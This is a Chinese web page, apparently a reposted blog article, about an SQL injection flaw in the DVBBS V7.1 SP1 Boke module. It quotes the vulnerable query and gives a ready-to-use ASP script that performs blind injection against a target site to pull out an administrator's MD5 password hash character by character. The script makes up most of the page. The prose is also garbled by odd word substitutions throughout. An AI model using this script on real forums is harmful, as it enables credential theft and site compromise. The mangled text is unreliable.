设为主页 | 加入收藏 | 繁體中文

DVBBS V7.1 SP1 Boke注入漏洞

  适才在《安全通告》版看到:
  动网论坛(DVBBS V7.1 SP1)Boke安全更新补丁20060302
  细致说明:
  该补丁为[Bug.Center.Team-毛病预警中间小组]公布,针对DVBBS V7.1 SP1 Boke程序的安全毛病所制作的安全更新补丁,紧缩包内存在ACCESS和MS_SQL两个版本,因程序影响面广,所以公布安全更新,请使用该版本的用户及时下载大概制止Boke办事,等候官方补丁公布.
  Boke水平当中的Cls_Main.asp存在紧张的安全毛病,致使恶意用户可以长途注射网站。DVBBS官方已经更新其毛病,但没见公布安全补丁。所以此为非官方公布版本。
  如有题目,请访问[Bug.Center.Team-毛病预警中间小组]官方网站咨询。
  就自己下载安置DVBBS V7.1 SP1
  对应一下发现只是在 Cls_Main.asp 中加入了一句:ArchiveLink = Replace(ArchiveLink,"'","")
  ArchiveLink 中可提取出 BokeName的值
  要是不过滤 “'”,将会在 205 行孕育发生注入毛病,具体代码为
  Sql = "Select UserID,UserName,NickName,BokeName,PassWord,BokeTitle,BokeChildTitle,BokeNote,JoinBokeTime,PageView,TopicNum,FavNum,PhotoNum,PostNum,TodayNum,Trackbacks,SpaceSize,XmlData,SysCatID,BokeSetting,LastUpTime,SkinID,Stats,S.S_SkinName,S.S_Path,S.S_ViewPic,S.S_Info,S.S_Builder From [Dv_Boke_User] U Inner Join [Dv_Boke_Skins] S On U.SkinID = S.S_ID"
  Sql = Lcase(Sql)
  If BokeName<>"" Then
  Sql = Sql & " where BokeName = '"&BokeName&"'"
  ElseIf BokeUserID>0 Then
  Sql = Sql & " where UserID = "&BokeUserID
  Else
  '请选取相关的DVBOKE,返回综合列表
  Exit Sub
  End If
  自己就写了一段ASP代码,主动得到MD5密码,水平有限,高手勿笑。
  CODE:  [Copy to clipboard]
  --------------------------------------------------------------------------------
【 


 


 


 


 

  <%
  '==================================================
  '
  '请将 [url]http://www.target.com/boke.asp[/url] 修改为有毛病的URL
  ' 将 admin 改为您要读取密码的用户ID
  '
  '==================================================
  Server.ScriptTimeout=300
  Response.Buffer = True
  Dim hehefulsh
  Dim charhex,OpenURL,templen,tempstr,newgetlen,theoffset,theURL,TheUser
  Set hehefulsh = CreateObject("Microsoft.XMLHTTP")
  charhex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")
  tempstr=""
  for total=0 to 15
  for theoffset=0 to 15
  templen=0
  OpenURL="http://www.target.com/boke.asp?admin'and'" & tempstr & charhex(theoffset) & "'=left(password," &total+1& ")and''='.index.html.index.html"
  hehefulsh.Open "Get",OpenURL, False, "", ""
  hehefulsh.Send
  GetPage = BytesToBstr(hehefulsh.ResponseBody)
  If InStr(GetPage,"该博客用户不存在或填写的资料有误!")=0 Then
  tempstr=tempstr & charhex(theoffset)
  response.write "前" & total+1 & "位MD5值为:" & tempstr & " 其他密码正在读取中,请等候。。。
"
  Response.Flush
  Exit for
  End if
  Next
  Next
  response.write "


成功读取密码的MD5值,为:" & tempstr & "


请不要使用本程序进行破坏举动!"
  Set hehefulsh = Nothing
  Function BytesToBstr(body)
  dim objstream
  set objstream = Server.CreateObject("adodb.stream")
  objstream.Type = 1
  objstream.Mode =3
  objstream.Open
  objstream.Write body
  objstream.Position = 0
  objstream.Type = 2
  objstream.Charset = "GB2312"
  BytesToBstr = objstream.ReadText
  objstream.Close
  set objstream = nothing
  End Function
  %>
 

 

 


    文章作者: 福州军威计算机技术有限公司
    军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
    版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:
评论加载中...
内容:
评论者: 验证码: